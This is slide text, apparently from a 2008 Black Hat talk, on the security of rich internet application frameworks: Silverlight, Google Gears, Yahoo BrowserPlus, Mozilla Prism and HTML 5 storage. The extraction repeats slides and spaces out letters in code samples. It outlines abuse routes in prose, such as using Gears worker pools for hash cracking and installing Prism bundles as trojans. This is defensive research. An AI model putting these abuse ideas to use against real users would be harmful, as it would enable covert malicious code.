clickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop distributing self-signed AIR applications fromAdobe.com
There is perhaps room for something between AIR andFlash without the rootkit abilities
Questions about Silverlight
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
64/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs disconnected Standalone app Privileged OS access Can launch itself
Local data storage Has an installer Raw network sockets Cross-domain XHR Dedicated session management
Can talk to the calling DOM IPC mechanisms Proper SSL security
Microsoft SilverlightWhat is Silverlight?
http://find/ -
7/29/2019 Ria World Bh 2008
65/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
What is Silverlight?
Cross browser plugin comparable in functionality to Flash
Subset of the .NET framework
Two versions:
Silverlight 1.0: releasedSilverlight 2.0: beta 2
Microsoft SilverlightWhat is Silverlight?
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
66/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Silverlight Bits
.XAP .ZIP container for Silverlight apps
XAML Extensible Application Markup LanguageCoreCLR CLR for .NET lite (simplified CAS)
XBAP XAML Browser Applications (CAS)
Managed Controls System.Windows.Forms UserControl
subclasses (CAS)
Microsoft SilverlightXAML
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
67/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
B i g g e r C at
S m a l l e r C at
Microsoft SilverlightXAML in Action
http://find/ -
7/29/2019 Ria World Bh 2008
68/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Microsoft SilverlightSilverlight Security Model
http://find/ -
7/29/2019 Ria World Bh 2008
69/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Silverlights simplified Code Access Security
SecurityTransparent Silverlight developer code, codesans attribute
SecuritySafeCritical New bridge code from Microsoft
SecurityCritical Slimmed .NET 3
Microsoft SilverlightSilverlight Security Model
http://find/ -
7/29/2019 Ria World Bh 2008
70/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This code will fail:u s i n g System . IO ;
F i l e . C r e a t e ( " d u m p s t e r m u f f i n . e x e " ) ;
This code will succeed:
u s i n g System . IO ;
I s o l a t e d S t o r a g e F i l e i s f = I s o l a t e d S t o r a g e F i l e . G e t U s e r S t o r e F o r A p p l i c a t i o n ( ) ;i s f . C r e a t e F i l e ( " r e l a t i v e P a t h " ) ;
This code will also fail:
u s i n g System . IO ;
I s o l a t e d S t o r a g e F i l e i s f = I s o l a t e d S t o r a g e F i l e . G e t U s e r S t o r e F o r A p p l i c a t i o n ( ) ;i s f . C r e a t e F i l e ( " C O M 3 " ) ;
Microsoft SilverlightIsolated Storage
http://find/ -
7/29/2019 Ria World Bh 2008
71/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Isolated Storage
The default storage quota is 1 MB per application
Storage is isolated per AppDomain
Microsoft SilverlightIsolated Storage
http://find/ -
7/29/2019 Ria World Bh 2008
72/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
You can deny local storage
Microsoft SilverlightNetwork Sockets
http://find/ -
7/29/2019 Ria World Bh 2008
73/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Network Sockets
TCP socket connections, limited port range 4502 - 4534
Requires clientaccesspolicy.xml (even to host of origin)
Microsoft SilverlightCross-domain and DOM access
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
74/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Crossdomain access and access to hosting DOM can beconfigured:
clientaccesspolicy.xml and crossdomain.xmlApplication manifest
Object parameters passed to plugin
enableHtmlAcess = false (default setting for cross-domain)
Questions about Gears
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
75/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs disconnected Standalone app Privileged OS access Can launch itself
Local data storage
Has an installer Raw network sockets Cross-domain XHR Dedicated session management
Can talk to the calling DOM IPC mechanisms Proper SSL security
Google Gears
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
76/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS SilverlightGoogle Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a localapp server, LocalServer
LocalServer acts as a broker between the browser andwebserver
Changes behavior depending on online status
Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser
Google Gears
http://find/ -
7/29/2019 Ria World Bh 2008
77/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a localapp server, LocalServer
LocalServer acts as a broker between the browser andwebserver
Changes behavior depending on online status
Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser
Google Gears
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
78/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a localapp server, LocalServer
LocalServer acts as a broker between the browser andwebserver
Changes behavior depending on online status
Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser
Google Gears
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
79/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a localapp server, LocalServer
LocalServer acts as a broker between the browser andwebserver
Changes behavior depending on online status
Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser
Google GearsSecurity mechanisms
http://find/ -
7/29/2019 Ria World Bh 2008
80/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Uses same origin to restrict access to site databases andLocalServer resource capture
Provides for parameterized SQL
Opt-in user dialog
Gears 0.3 allows for customization of this dialog. . .
L h
Google GearsNot a great feature. . .
http://find/ -
7/29/2019 Ria World Bh 2008
81/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Li i i h
Google GearsWorkerpool abuse
http://find/ -
7/29/2019 Ria World Bh 2008
82/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted
Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks
Applications for hash cracking, remote site attacks
Li i i the
Google GearsWorkerpool abuse
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
83/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted
Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks
Applications for hash cracking, remote site attacks
Living in the
Google GearsWorkerpool abuse
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
84/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted
Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks
Applications for hash cracking, remote site attacks
Living in the
Questions about Yahoo! BrowserPlus
http://find/ -
7/29/2019 Ria World Bh 2008
85/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs disconnected Standalone app Privileged OS access Can launch itself Local data storage Has an installer Raw network sockets Cross-domain XHR Dedicated session management
Can talk to the calling DOM IPC mechanisms Proper SSL security
Living in the
Yahoo! BrowserPlus
A challenger appear
http://find/ -
7/29/2019 Ria World Bh 2008
86/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Designed to allow for new browser plugins to be easilydeployed and updated
To address security, weve followed the same web security
precedent set by browser developers.But its even worse than that. . .
Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
No, you cant do that over SSL
Living in the
Yahoo! BrowserPlus
A challenger appear
http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/ -
7/29/2019 Ria World Bh 2008
87/199
Living in theRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Designed to allow for new browser plugins to be easilydeployed and updated
To address security, weve followed the same web security
precedent set by browser developers.But its even worse than that. . .
Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
No, you cant do that over SSL
Living in the
Yahoo! BrowserPlus
A challenger appear
http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/ -
7/29/2019 Ria World Bh 2008
88/199
gRIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Designed to allow for new browser plugins to be easilydeployed and updated
To address security, weve followed the same web security
precedent set by browser developers.But its even worse than that. . .
Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
No, you cant do that over SSL
Living in the
Yahoo! BrowserPlus
Architecture
http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/ -
7/29/2019 Ria World Bh 2008
89/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in the
Yahoo! BrowserPlus
Architecture
http://find/ -
7/29/2019 Ria World Bh 2008
90/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in the
Yahoo! BrowserPlus
Architecture
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
91/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in theRIA W ld
Yahoo! BrowserPlus
Architecture
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
92/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in theRIA W ld
Yahoo! BrowserPlus
Architecture
http://find/ -
7/29/2019 Ria World Bh 2008
93/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in theRIA World
Yahoo! BrowserPlus
Architecture
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
94/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in theRIA World
Yahoo! BrowserPlus
Architecture
http://find/ -
7/29/2019 Ria World Bh 2008
95/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installedon-demand, like:
Imagemagick for local image processing
Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter
These execute code on the local machine as the currentuser
In short, its ActiveX
Living in theRIA World
Yahoo! BrowserPlus
About this Ruby business. . .
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
96/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Included version: 1.8.6p0
Perfectly safe, as long as you dont use strings or arrays
Living in theRIA World
Yahoo! BrowserPlus
About this Ruby business. . .
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
97/199
RIA World
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Included version: 1.8.6p0
Perfectly safe, as long as you dont use strings or arrays
Living in theRIA World
Yahoo! BrowserPlus
Beating up old ladies
http://find/ -
7/29/2019 Ria World Bh 2008
98/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Of course, BrowserPlus
isnt totally baked yetIn Sneak Peek phase
Currently, only works with Yahoo! sites
All modules must be signed by Yahoo!
But this has to change before it can be widely adoptedAlso lacks some polish. . .
A d e s c r i p t i o n o f t h e c om pon en nt o og a b oo ga momma b i t e me y ea h y ea h y ea h .
Actual Yahoo! content
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/ -
7/29/2019 Ria World Bh 2008
99/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/ -
7/29/2019 Ria World Bh 2008
100/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
101/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/ -
7/29/2019 Ria World Bh 2008
102/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/ -
7/29/2019 Ria World Bh 2008
103/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Yahoo! BrowserPlus
Summary
http://find/ -
7/29/2019 Ria World Bh 2008
104/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
This is a very dangerous idea.
Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or
control: full privilege.
Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override
revocation mechanisms.Bottom line unsafe at any speed.
Living in theRIA World
Mozilla PrismQuick Summary
http://find/ -
7/29/2019 Ria World Bh 2008
105/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Runs disconnected Standalone app Privileged OS access Can launch itself Local data storage
Has an installer Raw network sockets Cross-domain XHR Dedicated session management
Can talk to the calling DOM
IPC mechanisms Proper SSL security
Living in theRIA World
Mozilla Prism
http://find/ -
7/29/2019 Ria World Bh 2008
106/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Formerly WebRunner wraps webapps to appear asdesktop apps
Standalone browser instance, restricted to one domainExternal links open a regular browser
Separate user profile
Certificate errors are a hard failure
Living in theRIA World
Mozilla Prism
http://find/ -
7/29/2019 Ria World Bh 2008
107/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Consists of a webapp bundle with id, URI, CSS, scriptingand UI rules in an INI:
[ P a r a m e t e r s ]i d=i s e c . s i t e @ i s e c p a r t n e r s . comu r i=h t t p s : / /www . i s e c p a r t n e r s . com/i c o n=i s e cs t a t u s=nol o c a t i o n=nos i d e b a r=non a v i g a t i o n=no
Living in theRIA World
Mozilla PrismExample bundles
http://find/ -
7/29/2019 Ria World Bh 2008
108/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Living in theRIA World
Mozilla PrismBundles
http://find/ -
7/29/2019 Ria World Bh 2008
109/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)
Script in 3rd-party bundles allows modifying browserbehavior just like an extension
Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles
Living in theRIA World
Mozilla PrismBundles
http://find/ -
7/29/2019 Ria World Bh 2008
110/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)
Script in 3rd-party bundles allows modifying browserbehavior just like an extension
Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles
Living in theRIA World
Mozilla PrismBundles
http://find/ -
7/29/2019 Ria World Bh 2008
111/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)
Script in 3rd-party bundles allows modifying browserbehavior just like an extension
Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles
Living in theRIA World
Mozilla PrismPrism Install UI
http://find/ -
7/29/2019 Ria World Bh 2008
112/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Living in theRIA World
Mozilla PrismAbuse
http://find/ -
7/29/2019 Ria World Bh 2008
113/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Looks like a bookmark dialog
No warnings for install
Full XPCOM scripting privileges
Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning
Living in theRIA World
Mozilla PrismAbuse
http://find/ -
7/29/2019 Ria World Bh 2008
114/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Looks like a bookmark dialog
No warnings for install
Full XPCOM scripting privileges
Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning
Living in theRIA World
Mozilla PrismAbuse
http://find/ -
7/29/2019 Ria World Bh 2008
115/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Looks like a bookmark dialog
No warnings for install
Full XPCOM scripting privileges
Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning
Living in theRIA World
Mozilla PrismAbuse
http://find/http://goback/ -
7/29/2019 Ria World Bh 2008
116/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
Looks like a bookmark dialog
No warnings for install
Full XPCOM scripting privileges
Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning
Living in theRIA World
HTML 5New features in Firefox and WebKit
http://find/ -
7/29/2019 Ria World Bh 2008
117/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google GearsY! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
The standards-based approach
Introduces DOM storage sessionStorage andlocalStorage
sessionStorage stores arbitrary amounts of data for a singlesessionlocalStorage persists beyond the session never expires,limited to 5M
Database storage via openDatabase()
All expected to be same-origin
Living in theRIA World
HTML 5New features in Firefox and WebKit
http://find/ -
7/29/2019 Ria World Bh 2008
118/199
Introduction
Who are we?
Whats a RIA?
Why use RIA?
Frameworks
Adobe AIR
MS Silverlight
Google Gears
Y! BrowserPlus
Mozilla Prism
HTML 5
AttackScenarios
RIA vs OS
RIA vs the web
RIA vs RIA
